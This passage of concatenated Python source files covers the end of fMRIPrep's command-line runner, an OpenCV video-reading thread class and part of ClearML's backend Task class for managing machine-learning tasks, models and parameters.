' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = op.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Setting up MultiProc
nthreads = opts.nthreads
if nthreads < 1:
nthreads = cpu_count()
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'n_procs': nthreads,
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
# Overload plugin_settings if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.debug,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
return retval
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
video_read.py
|
from threading import Thread
from os.path import expanduser
import numpy as np
import cv2
from pathlib import Path
from PIL import Image
from .config import config
class VideoReader:
footage_path = config.CONFIG['footage_path']
footage_files = config.CONFIG['footage_files']
width = config.CONFIG['width']
height = config.CONFIG['height']
device_video = bool(config.CONFIG['device_video'])
currentvideo = None
default_image_np_global = np.zeros([width, height, 3], dtype=np.uint8)
capture_frame_rgb_np = None
capture_frame_rgb = None
logger = config.logger
frame_number = 0
def __init__(self):
self.logger.debug('VideoRead')
self.logger.debug('Config at: ' + str(config.CONFIG_FILE))
self.logger.debug(config.CONFIG)
video_read_thread = Thread(target=self.video_read)
video_read_thread.start()
self.logger.debug('video_read_thread started')
def video_read(self):
for footage_file in self.footage_files:
self.logger.debug('Processing: ' + footage_file)
self.currentvideo = footage_file
self.frame_number = 0
if self.device_video:
video = 0
else:
video = Path(self.footage_path + '/' + footage_file)
try:
video = expanduser(Path(self.footage_path + '/' + footage_file))
except BaseException:
pass
cap = cv2.VideoCapture(video)
while(cap.isOpened() and not config.GLOBAL_EXIT_SIGNAL):
ret, frame = cap.read()
try:
if frame is not None:
self.frame_number += 1
frame = cv2.resize(frame, (self.width, self.height))
ar = frame
ar = ar[:, :, 0:3]
(im_height, im_width, _) = frame.shape
self.default_image_np_global = np.array(ar).reshape((im_height, im_width, 3)).astype(np.uint8)
self.capture_frame_rgb_np = cv2.cvtColor(self.default_image_np_global, cv2.COLOR_BGR2RGB)
self.capture_frame_rgb = Image.fromarray(self.capture_frame_rgb_np)
else:
break
except RuntimeError as re:
self.logger.debug("default_capture_thread:" + str(re))
# cv2.imshow('video_read', self.default_image_np_global)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cap.release()
cv2.destroyAllWindows()
config.GLOBAL_EXIT_SIGNAL = True
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
from copy import copy
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_store_diff = config.get('development.store_uncommitted_code_diff', False)
_store_remote_diff = config.get('development.store_code_diff_from_remote', False)
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate()
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git is too large to store on the task, we must store it as artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if config.get('development.detect_with_pip_freeze', False) or \
config.get('development.detect_with_conda_freeze', False):
requirements, conda_requirements = pip_freeze(
config.get('development.detect_with_conda_freeze', False))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \
not Session.check_min_api_version('2.8'):
print('WARNING: Changing task type to "{}" : '
'clearml-server does not support task type "{}", '
'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type.value))
task_type = self.TaskTypes.training
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", ""))
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
# type: () -> Optional[str]
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
# type: (str) -> ()
self._set_storage_uri(value)
@property
def task_id(self):
# type: () -> str
return self.id
@property
def name(self):
# type: () -> str
return self.data.name or ''
@name.setter
def name(self, value):
# type: (str) -> ()
self.set_name(value)
@property
def task_type(self):
# type: () -> str
return self.data.type
@property
def project(self):
# type: () -> str
return self.data.project
@property
def parent(self):
# type: () -> str
return self.data.parent
@property
def input_model_id(self):
# type: () -> str
return self.data.execution.model
@property
def output_model_id(self):
# type: () -> str
return self.data.output.model
@property
def comment(self):
# type: () -> str
return self.data.comment or ''
@comment.setter
def comment(self, value):
# type: (str) -> ()
self.set_comment(value)
@property
def cache_dir(self):
# type: () -> Path
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
# type: () -> str
"""
The Task's status. To keep the Task updated.
ClearML reloads the Task status information only, when this value is accessed.
return str: TaskStatusEnum status
"""
return self.get_status()
@property
def _status(self):
# type: () -> str
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
# type: () -> Optional[Model]
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
# type: () -> Optional[Model]
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
# type: () -> Model
return self._get_output_model(upload_required=False, force=True)
def reload(self):
# type: () -> ()
"""
Reload current Task's state from clearml-server.
Refresh all task's fields, including artifacts / models / parameters etc.
"""
return super(Task, self).reload()
def _get_output_model(self, upload_required=True, force=False, model_id=None):
# type: (bool, bool, Optional[str]) -> Model
return Model(
session=self.session,
model_id=model_id or (None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False)),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
# type: () -> Metrics
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def _reporter(self):
# type: () -> Reporter
"""
Returns a simple metrics reporter instance.
"""
if self.__reporter is None:
self._setup_reporter()
return self.__reporter
def _get_metrics_manager(self, storage_uri):
# type: (str) -> Metrics
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task=self,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
# type: () -> Reporter
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self.__reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self.__reporter
def _get_output_destination_suffix(self, extra_path=None):
# type: (Optional[str]) -> str
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
# type: () -> Any
""" Reload the task object from the backend """
with self._edit_lock:
if self._offline_mode:
# noinspection PyBroadException
try:
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f:
stored_dict = json.load(f)
stored_data = tasks.Task(**stored_dict)
# add missing entries
for k, v in stored_dict.items():
if not hasattr(stored_data, k):
setattr(stored_data, k, v)
if stored_dict.get('project_name'):
self._project_name = (None, stored_dict.get('project_name'))
except Exception:
stored_data = self._data
return stored_data or tasks.Task(
execution=tasks.Execution(
parameters={}, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd=''),
output=tasks.Output())
if self._reload_skip_flag and self._data:
return self._data
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
# type: (bool) -> ()
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
elif self._data:
# if not started, make sure the current cached state is synced
self._data.status = self.TaskStatusEnum.created
self.reload()
def started(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True, force=False):
# type: (bool, bool) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
# type: (bool, Optional[str], Optional[str]) -> ()
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
# type: (bool) -> ()
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def _delete(
self,
delete_artifacts_and_models=True,
skip_models_used_by_other_tasks=True,
raise_on_error=False,
):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as it's output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True an exception will be raised when encountering an error.
If False an error would be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
try:
res = self.send(tasks.GetByIdRequest(self.task_id))
task = res.response.task
if task.status == Task.TaskStatusEnum.published:
if raise_on_error:
raise self.DeleteError("Cannot delete published task {}".format(self.task_id))
self.log.error("Cannot delete published task {}".format(self.task_id))
return False
execution = {}
models_res = []
if delete_artifacts_and_models:
execution = task.execution.to_dict() if task.execution else {}
models_res = self.send(
models.GetAllRequest(
task=[task.id], only_fields=["id", "uri"]
)
).response.models
event_uris = list(self._get_all_events(
event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000
))
event_uris.extend(self._get_image_plot_uris())
task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True))
if not task_deleted:
if raise_on_error:
raise self.DeleteError("Failed deleting task {}".format(self.task_id))
self.log.error("Failed deleting task {}".format(self.task_id))
return False
except self.DeleteError:
raise
except Exception as ex:
if raise_on_error:
raise self.DeleteError("Task deletion failed: {}".format(ex))
self.log.error("Task deletion failed: {}".format(ex))
return False
failures = []
if delete_artifacts_and_models:
for e in execution["artifacts"]:
if e["mode"] == "output" and not self._delete_uri(e["uri"]):
failures.append(e["uri"])
for m in models_res:
# noinspection PyBroadException
try:
is_output_model = task.output and (m.id == task.output.model)
res = self.send(
models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)),
ignore_errors=is_output_model
)
# Should delete if model was deleted or if this was the output model (which was already deleted
# by DeleteRequest, and it's URI is dangling
should_delete = is_output_model or res.response.deleted
except SendError as ex:
if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201):
# Model not found, already deleted by DeleteRequest
should_delete = True
else:
failures.append("model id: {}".format(m.id))
continue
except Exception as ex:
failures.append("model id: {}".format(m.id))
continue
if should_delete and not self._delete_uri(m.uri):
failures.append(m.uri)
for uri in event_uris:
if not self._delete_uri(uri):
failures.append(uri)
if len(failures):
error = "Failed deleting the following URIs:\n{}".format(
"\n".join(failures)
)
if raise_on_error:
raise self.DeleteError(error)
self.log.error(error)
return task_deleted
def _delete_uri(self, uri):
# type: (str) -> bool
# noinspection PyBroadException
try:
deleted = StorageHelper.get(uri).delete(uri)
if deleted:
self.log.debug("Deleted file: {}".format(uri))
return True
except Exception as ex:
self.log.error("Failed deleting {}: {}".format(uri, str(ex)))
return False
return False
def _get_image_plot_uris(self):
# type: () -> Set[str]
def image_source_selector(d):
plot = d.get("plot_str")
if plot:
# noinspection PyBroadException
try:
plot = json.loads(plot)
return next(
filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))),
None
)
except Exception:
pass
return self._get_all_events(
event_type="plot",
unique_selector=image_source_selector,
batch_size=10000
)
def update_model_desc(self, new_model_desc_file=None):
# type: (Optional[str]) -> ()
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
# type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> ()
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI)
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(
uri=model_uri, task_id=self.id, name=name, comment=comment, tags=tags)
def update_output_model_and_upload(
self,
model_file, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
tags=None, # type: Optional[Sequence[str]]
async_enable=False, # type: bool
cb=None, # type: Optional[Callable[[Optional[bool]], bool]]
iteration=None, # type: Optional[int]
):
# type: (...) -> str
"""
Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method),
then ClearML updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param str model_file: The path to the updated model weights file.
:param str name: The updated model name. (Optional)
:param str comment: The updated model description. (Optional)
:param list tags: The updated model tags. (Optional)
:param bool async_enable: Request asynchronous upload
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(default)
:param callable cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``,
this is a callback that is invoked once the asynchronous upload and update complete.
:param int iteration: iteration number for the current stored model (Optional)
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``,
this is the expected URI, as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
# type: () -> ()
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
# type: () -> dict
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
# type: (dict, bool) -> ()
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
# type: (str, Optional[str], bool, bool) -> ()
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **ClearML Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design
- ``True`` - ClearML copies the Task's model design from the input model.
- ``False`` - ClearML does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration
- ``True`` - ClearML copies the Task's label enumeration from the input model.
- ``False`` - ClearML does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def get_parameters(self, backwards_compatibility=True):
# type: (bool) -> (Optional[dict])
"""
Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not
support parameter descriptions (the result is a dictionary of key-value pairs).
Notice the returned parameter dict is flat:
i.e. {'Args/param': 'value'} is the argument "param" from section "Args"
:param backwards_compatibility: If True (default) parameters without section name
(API version < 2.9, clearml-server < 0.16) will be at dict root level.
If False, parameters without section name, will be nested under "Args/" key.
:return: dict of the task parameters, all flattened to key/value.
Different sections with key prefix "section/"
"""
if not Session.check_min_api_version('2.9'):
return self._get_task_property('execution.parameters')
# API will makes sure we get old parameters with type legacy on top level (instead of nested in Args)
parameters = dict()
hyperparams = self._get_task_property('hyperparams') or {}
if not backwards_compatibility:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
parameters['{}/{}'.format(section, key)] = section_param.value
else:
for section in hyperparams:
for key, section_param in hyperparams[section].items():
if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ):
parameters['{}'.format(key)] = section_param.value
else:
parameters['{}/{}'.format(section, key)] = section_param.value
return parameters
def set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
